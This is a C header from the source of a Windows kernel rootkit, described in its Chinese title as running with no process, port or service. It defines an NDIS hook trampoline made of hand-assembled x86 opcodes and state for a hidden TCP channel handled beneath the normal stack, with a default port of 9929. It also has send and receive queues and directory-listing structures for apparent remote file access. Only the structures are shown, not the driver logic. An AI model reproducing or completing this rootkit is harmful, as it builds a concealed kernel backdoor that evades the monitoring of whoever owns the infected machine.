structs.h

一个驱动上实现 无进程 无端口 无服务的简单rootkit

#ifndef U_STRUCTS
#define U_STRUCTS

#include <ntddk.h>
#include "TcpIpHdr.h"


//--------------------------------------------------------------------
////struct
#pragma pack(push)
#pragma pack(1)
typedef struct _HOOK_CONTEXT_STRUCT
{
	//runtime code
	UCHAR    code1_0x58; //0x58 | pop  eax      | pop caller IP from stack to eax
	UCHAR    code2_0x68; //0x68 | push IMM      | push our hook context address
	struct _HOOK_CONTEXT_STRUCT *m_pHookContext;//point this 
	UCHAR    code3_0x50; //0x50 | push eax		| push caller IP from eax to stack 
	UCHAR    code4_0xE9; //0xE9 | jmp HookProc  | jump our hook proc
	ULONG   m_pHookProcOffset;

	//our context data

	PVOID    m_pOriginalProc;
	PVOID    m_pHookProc;
	PVOID    m_pBindAdaptHandle;
	PVOID    m_pProtocolContent;
	PVOID   *m_ppOriginPtr;

	struct _HOOK_CONTEXT_STRUCT *m_pHookNext;
	
}HOOK_CONTEXT_STRUCT;
#pragma pack(pop)
//--------------------------------------------------------------------


#define MAX_PACKET_SIZE 1600  //whAt?
//from privAte\net\sockets\winsock2\dll\sinsock2\Addrconv.cpp
#define HTONS(s) ( ( ((s) >> 8) & 0x00FF ) | ( ((s) << 8) & 0xFF00 ) )
#define NTOHS(s) HTONS(s) 
#define HTONL(l)                            \
	( ( ((l) >> 24) & 0x000000FFL ) |       \
	( ((l) >>  8) & 0x0000FF00L ) |       \
	( ((l) <<  8) & 0x00FF0000L ) |       \
	( ((l) << 24) & 0xFF000000L ) )
#define NTOHL(l) HTONL(l)
//--------------------------------------------------------------------
typedef
struct _TCPS_Conection
{
	LIST_ENTRY			m_ListElement;
	HANDLE				m_pBindAdaptHandle;//NDIS_HANDLE
	BOOLEAN				m_bIsConnected;
	BOOLEAN				m_bIsConnecting;
	ULONG				m_ReSendCount;
	//pArt of ETHHDR
	UCHAR				m_SourceMAc[ETH_ALEN];
	UCHAR				m_OurMAc[ETH_ALEN];
	//pArt of IPHDR
	ULONG				m_SourceIp;//源ip
	ULONG				m_OurIp; //our ip
	//pArg of TCPHDR
	USHORT				m_SourcePort;
	USHORT				m_OurPort;//defAult is 9929
	ULONG				m_Seq;//当前的seq和 Ack_seq
	ULONG				m_Ack_seq;
	ULONG				m_IsSyn;
	ULONG				m_ExpectedSeq;////////
	ULONG				m_ExpectedAck_seq;////////
	USHORT				m_Window;
	//
	ULONG				m_PAcketsLeftToBeSend;
	ULONG				m_DAtALength;
	WCHAR				m_PAth[512];//the current pAth,beggin with \??\ eg. \??\c:\WINDOWS
}TCPS_Connection,*PTCPS_Connection;

//--------------------------------------------------------------------
#define DATALENGTH	1024
typedef struct _RECVLIST *PRECVLIST;
typedef struct _RECVLIST
{
	char				dAtA[DATALENGTH];//bug 这样太浪费空间,应该在加入数据的时候动态分配
	PTCPS_Connection	pConnection;
	PRECVLIST			pNext;

}RECVLIST,*PRECVLIST;

typedef struct _RECVLISTHEAD
{
	KSPIN_LOCK	kspRecvListLock;
	KSEMAPHORE	ksemRecvListSemAphore;
	PRECVLIST	pListFront;
	PRECVLIST	pListBAck;

}RECVLISTHEAD,*PRECVLISTHEAD;
//--------------------------------------------------------------------

//--------------------------------------------------------------------
//存放待发送的包
typedef struct _SENDLIST *PSENDLIST;
typedef struct _SENDLIST
{
	PVOID				pBuffer;
	ULONG				ulBufferLength;
	PTCPS_Connection	pConnection;
	PSENDLIST			pNext;

}SENDLIST,*PSENDLIST;

typedef struct _SENDLISTHEAD
{
	KSPIN_LOCK	kspSendListLock;
	KSEMAPHORE	ksemSendListSemAphore;
	PSENDLIST	pListFront;
	PSENDLIST	pListBAck;

}SENDLISTHEAD,*PSENDLISTHEAD;
//--------------------------------------------------------------------


#define MAX_CONNECTIONS 32


//--------------------------------------------------------------------
typedef struct _FILE_DIRECTORY_INFORMATION { // Information Class 1
	ULONG NextEntryOffset;
	ULONG Unknown;
	LARGE_INTEGER CreationTime;
	LARGE_INTEGER LastAccessTime;
	LARGE_INTEGER LastWriteTime;
	LARGE_INTEGER ChangeTime;
	LARGE_INTEGER EndOfFile;
	LARGE_INTEGER AllocationSize;
	ULONG FileAttributes;
	ULONG FileNameLength;
	WCHAR FileName[1];
} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;
//--------------------------------------------------------------------





#endif //#ifndef U_FUKTDI